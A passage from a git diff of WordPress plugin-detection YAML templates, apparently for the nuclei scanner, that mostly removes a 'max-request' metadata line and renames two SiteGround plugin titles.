wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc316f9f7a..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..dc3d446af3 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -1,13 +1,12 @@ id: wordpress-sg-cachepress info: - name: SiteGround Optimizer Detection + name: Speed Optimizer – The All-In-One WordPress Performance-Boosting Plugin Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..96b4699d2d 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -1,13 +1,12 @@ id: wordpress-sg-security info: - name: All-inclusive Security Solution by SiteGround Detection + name: Security Optimizer – The All-In-One WordPress Protection Plugin Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 1bb9a283ce..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 87721a245a..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 45e0dead0e..dbbadf3cfc 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index aa1898c4ba..48ffb25245 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: 